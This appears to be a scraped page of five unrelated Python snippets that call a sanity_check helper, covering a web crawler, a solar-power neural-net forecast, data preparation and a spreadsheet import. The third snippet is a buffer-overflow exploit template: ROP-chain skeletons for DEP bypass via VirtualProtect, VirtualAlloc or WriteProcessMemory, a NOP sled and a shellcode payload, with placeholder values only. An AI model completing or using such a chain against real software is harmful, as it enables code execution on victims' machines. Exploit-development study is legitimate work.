Esempio n. 1
0
 def __init__(self, url, url_count=None, timeout=3, multi=5, strict=False):
     if sanity_check(url, url_count, multi):
         self.crawler_queue = Queue.Queue()
         self.directory = {}  #Directory structure of crawled links
         self.root = url
         self.url_count = url_count  #Max number of pages to crawl
         self.visits = set(
             []
         )  #List of visited pages implemented in Set for faster lookups
         self.timeout = timeout  #Timeout for the page requests
         self.strict = strict  #Strictly crawls same domain urls
         self.multi = multi  #Concurrent requests can happen
     else:
         return None
Esempio n. 2
0
def forecast_ann(df, forecast, day, seed, num_epochs):
    # don't try to predict pv at night!
    day_df = df[df['zenith'] < 87]
    # set up inputs
    input_df = ann_inputs(day_df)

    # set up output
    output_column = 'pv_power'
    output = day_df[output_column]
    # normalise the output (Y)
    output_max = output.max()
    if output_max > 0:
        output = output / output_max

    # smooth the pv output first ??! - makes it worse!!
#   b = gaussian(39, 3)
#   gf = filters.convolve1d(output.values, b/b.sum())
#   output.update(gf)

# normalise the inputs (X)
    input_max = utils.df_normalise(input_df)

    # santity check
    utils.sanity_check(input_df)
    # santity check
    if output.isna().sum() > 0:
        print("ERROR NaN in output")
        quit()

    if output.isna().sum() > 0:
        print("ERROR NaN in output")
        quit()

    inputs = torch.tensor(input_df.values.astype(np.float32))
    #   print("inputs")
    #   print(inputs)
    #   The .view seems to tell it what shape the data is
    targets = torch.tensor(output.values.astype(np.float32)).view(-1, 1)
    #   print("targets")
    #   print(targets)
    #   torch.manual_seed(1)    # reproducible
    torch.manual_seed(seed)  # reproducible
    #   torch.manual_seed(8)    # reproducible
    train_ds = TensorDataset(inputs, targets)
    #   train_ds[0:3]

    # Define data loader
    #   batch_size = 1
    #   batch_size = 5
    batch_size = 100
    train_dl = DataLoader(train_ds, batch_size, shuffle=True)
    next(iter(train_dl))

    num_inputs = len(input_df.columns)
    # model using ANN
    model = SimpleNet(num_inputs, 1)

    # Define optimizer
    opt = torch.optim.SGD(model.parameters(), lr=1e-3)

    # Define loss function
    #   loss_fn = F.mse_loss
    loss_fn = F.l1_loss

    loss = loss_fn(model(inputs), targets)
    #   print(loss)
    # Train the model for 100 epochs
    #   num_epochs=300
    losses = fit(num_epochs, model, loss_fn, opt, train_dl)
    print('Training loss: ', loss_fn(model(inputs), targets))
    # prediction
    #   print(preds)
    #   print(targets)
    forecast_day = forecast.loc[day.strftime('%Y-%m-%d')].copy()
    #   print(forecast_day)
    day_f = forecast_day[forecast_day['zenith'] < 87]
    #   print(day_f)
    #   previous_day = utils.get_previous_week_day(day_df, day)
    #   previous_day = utils.get_previous_week_day(df, day)
    #   print(previous_day)
    #   delta = forecast_day.first_valid_index().date() - previous_day.first_valid_index().date()
    #   print(delta)
    input_f = ann_inputs(forecast_day)
    #   print(input_f)
    # normalise the inputs (using same max as for the model)
    for column in input_f.columns:
        input_f[column] = input_f[column] / input_max[column]
    f_inputs = torch.tensor(input_f.values.astype(np.float32))
    preds = model(f_inputs)

    forecast_day['prediction'] = 0.0
    # denormalize using df for the original model
    prediction_values = preds.detach().numpy() * output_max
    # set forecast for zentih angle for daylight
    forecast_day['prediction'] = prediction_values
    forecast_day.loc[forecast_day['zenith'] > 87, 'prediction'] = 0.0
    forecast.loc[day.strftime('%Y-%m-%d'),
                 'prediction'] = forecast_day['prediction'].values

    #   print(forecast)
    return losses
Esempio n. 3
0
def get_rop_chain() -> bytes:
    # BOOL VirtualProtect(
    #   LPVOID lpAddress,
    #   SIZE_T dwSize,
    #   DWORD  flNewProtect,
    #   PDWORD lpflOldProtect
    # );
    #
    # skeleton = RopChain()
    # skeleton += 0x41414141                # VirtualProtect address
    # skeleton += 0x42424242                # shellcode return address to return to after VirtualProtect is called
    # skeleton += 0x43434343                # lpAddress (same as above)
    # skeleton += 0x44444444                # dwSize (size of shellcode, 0x300 or so)
    # skeleton += 0x45454545                # flNewProtect (0x40)
    # skeleton += 0x46464646                # lpflOldProtect (some writable memory address)
    # -------------------------
    # -------------------------
    # LPVOID VirtualAlloc(
    #   LPVOID lpAddress,
    #   SIZE_T dwSize,
    #   DWORD  flAllocationType,
    #   DWORD  flProtect
    # );
    #
    # skeleton  = RopChain()
    # skeleton += 0x41414141                # VirtualAlloc address
    # skeleton += 0x42424242                # shellcode return address to return to after VirtualAlloc is called
    # skeleton += 0x43434343                # lpAddress (shellcode address)
    # skeleton += 0x44444444                # dwSize (0x1)
    # skeleton += 0x45454545                # flAllocationType (0x1000)
    # skeleton += 0x46464646                # flProtect (0x40)
    # -------------------------
    # -------------------------
    # BOOL WriteProcessMemory(
    #   HANDLE  hProcess,
    #   LPVOID  lpBaseAddress,
    #   LPCVOID lpBuffer,
    #   SIZE_T  nSize,
    #   SIZE_T  *lpNumberOfBytesWritten
    # );
    #
    # skeleton  = RopChain()
    # skeleton += 0x41414141                # WriteProcessMemory address
    # skeleton += 0x42424242                # shellcode return address to return to after WriteProcessMemory is called
    # skeleton += 0xffffffff                # hProcess (pseudo Process handle)
    # skeleton += 0x44444444                # lpBaseAddress (Code cave address)
    # skeleton += 0x45454545                # lpBuffer (shellcode address)
    # skeleton += 0x46464646                # nSize (size of shellcode)
    # skeleton += 0x47474747                # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)
    # -------------------------
    # -------------------------

    ropnop = 0x0
    offset_to_eip = 0

    rop = RopChain(chain=b'A' * (offset_to_eip - len(skeleton)))
    rop += skeleton.chain

    rop += 0x0
    ############################
    # EAX =>
    # EBX =>
    # ECX =>
    # EDX =>
    # ESI =>
    # EDI =>
    # -------------------------
    # skeleton[0] = 0x41414141
    # skeleton[1] = 0x42424242
    # skeleton[2] = 0x43434343
    # skeleton[3] = 0x44444444
    # skeleton[4] = 0x45454545
    # skeleton[5] = 0x46464646
    ############################

    rop += b'\x90' * 20
    rop += get_payload()

    sanity_check(rop.chain, bad_chars)

    return rop.chain
Esempio n. 4
0
print(label_encoder_train)

train_set = {}
for class_, path in zip(labels_train, data_train):
    if label_encoder_train[class_] not in train_set:
        train_set[label_encoder_train[class_]] = []
    train_set[label_encoder_train[class_]].append(path)
print(train_set.keys())
data = train_set
del train_set
del keys_all_train
del label_encoder_train

print("Num classes for source domain datasets: " + str(len(data)))
print(data.keys())
data = utils.sanity_check(data)  # 200 labels samples per class
print("Num classes of the number of class larger than 200: " + str(len(data)))

for class_ in data:
    for i in range(len(data[class_])):
        image_transpose = np.transpose(data[class_][i],
                                       (2, 0, 1))  # (9,9,100)-> (100,9,9)
        data[class_][i] = image_transpose

# source few-shot classification data
metatrain_data = data
print(len(metatrain_data.keys()), metatrain_data.keys())
del data

# source domain adaptation data
print(source_imdb['data'].shape)  # (77592, 9, 9, 100)
Esempio n. 5
0
    # get the material type
    _type = row[columns.index("PresType")].value
    try:
        pt = PresentationType.objects.get(name=_type)
    except:
        print "Creating PresentationType: %s" % _type
        pt = PresentationType.objects.create(name=_type)

    kwargs['presentation_type'] = pt

    return kwargs

rows = get_rows('hub/imports/fixtures/2016Presentations.xlsx', '2016')

# run the sanity check first
skip_index_list = sanity_check(rows, columns, column_mappings)

print "importing presentations"

rows = get_rows('hub/imports/fixtures/2016Presentations.xlsx', '2016')
count = 0
for row in rows:

    """
    openpyxl returns incomplete rows, so I extend them here.
    """
    if len(row) < len(columns):
        class MockVal:
            def __init__(self, value):
                self.value = value
        new_row = []